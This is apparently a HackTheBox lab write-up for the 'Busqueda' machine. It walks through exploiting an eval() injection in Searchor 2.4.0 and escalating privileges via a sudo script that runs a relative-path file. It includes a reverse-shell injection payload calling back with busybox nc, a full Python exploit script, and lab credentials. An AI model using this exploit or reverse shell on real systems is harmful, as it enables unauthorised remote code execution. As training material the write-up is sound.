HackTheBox Writeup – Busqueda (Linux) – Easy Difficulty
Introduction
When I was at my last job, one of the senior pentesters told me that the way he warmed up was by doing an easy difficulty CTF – then he’d move to the medium difficulty ones. That was my goal for today. It didn’t really work out that way, though – writing the python script for exploitation later took too much time. Other than that, this was a fun box.
Enumeration / Initial Foothold
I start off with some RustScan to enumerate the ports: rustscan 10.10.11.208 –range 1-65535 — -A -sC -sV | tee nmap.txt
But I don’t find much.
After punching the IP in Firefox, it redirects us to searcher.htb – so we add that to our hosts file.
If you run a search, it constructs a query for any selected web application, as seen below.
If we navigate to the bottom of the page, we can see that it’s Searchor 2.4.0. I thought this was an original HTB website – but this is a Python web application. Searching the version of Searchor on Google leads to tons of exploits, but it’s pretty obvious these were created after the machine was published. Let’s not use them – let’s create our own exploit.
We can find the CVE for this particular version of Searchor.
It uses a insecure implementation of the eval() function – we can go right to the commit from when Searchor was patched and identify the insecure code.
So basically, the vulnerable code is url = eval(f”Engine.{engine}.search(‘{query}’, copy_url={copy}, open_web={open})”)
The query part is the post data we send. We can terminate the argument by using the apostrophe to make the curly bracket a string, and then add our own reverse shell as a second argument to the eval function – and finally use # to terminate the rest of the command. That way it will execute our own code like this.
url = eval(f”Engine.{engine}.search(‘{', __import__('os').system('sleep 20')) #}’, copy_url={copy}, open_web={open})”)
The next part is getting a shell. I cycle through available shells on revshells until I find that busybox calls back on my listener as the user SVC, using the post data: engine=Amazon&query=’, __import__(‘os’).system(‘busybox nc 10.10.14.3 443 -e sh’)) #
I wrote the exploit into a python script, which can be found on my github at https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE
I will also put it below so you can run it if you don’t want to exploit it yourself.
#!python
import base64
import requests
import time
import sys
print("Please start a netcat listener.")
ipaddress = input("What is your IP address? ")
port = input("What port is the listener using? ")
target = input("What's the target URL for the post form? For example: https://test.com/search ")
#Change the exploit code in payload if you want to use something that is not Busybox.
payload = ("busybox nc " + ipaddress + " " + port + " " + "-e bash")
payloadbyte = payload.encode('utf-8')
encodedpayload = base64.b64encode(payloadbyte).decode('utf-8')
exploitcode = ("', __import__('os').system('echo " + encodedpayload + " | base64 -d | bash -i')) \\")
exploitcode2 = exploitcode.replace("\\","#")
print(exploitcode2)
postdata = {
'engine': "Amazon",
'query': exploitcode2
}
print("Now sending a busybox payload that should call back to your listener at port " + port + ".")
response = requests.post(target, data = postdata)
time.sleep(3)
sys.exit()Privilege Escalation
In the /var/www/app folder, there’s a .git folder. I download it using pwncat’s native download feature, and in the config file, there’s a password.
cody:jh1usoih2bkjaspwe92 can be used for svc, and this way we can see we have sudo perms for a docker-related script.
Since we saw before that gitea is another subdomain it’s hosting, so we add gitea.searcher.htb to hosts.
We can sign in with the creds we already have for cody but I find nothing useful here.
However, we can read some notes on docker commands and exploitation on https://exploit-notes.hdks.org/exploit/container/docker/. After running docker-ps to get container IDs, we can use this to run this docker inspect command and get more info: sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' f84a6b33fb5a
And if you look closely, we can see a “MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh”. We can use this to log on as the “administrator” user on Gitea. This lets us read the scripts that we had sudo access to. Before, we could execute them, but we couldn’t read them.
Ok, let’s read system-checkup.py
It runs ./full-checkup.sh from the working directory. This means we can easily put any file with this name in the working directory we execute the command from and it will give us sudo perms when running it.
I put a basic bash script to add a user called admin with full sudo privs in my home directory, run sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup.sh then su admin. This gives me root access as a super user, but if you just want to get the root flag easily, just use something like:
#!/bin/bash
cat /root/flag.txt
Either way we have root privileges.
Lessons Learned
- Don’t rely on other people’s web exploits, because one day you might need to come up with your own. I didn’t need to today, but I did anyways because I’m rusty in Python and wanted to practice.
- No privesc? Keep enumerating. Always has been, always will be a good solution.
- If HackTricks or any other source of info doesn’t work, keep branching out. There’s always information somewhere.
Song Of The Day – We Close Our Eyes by Go West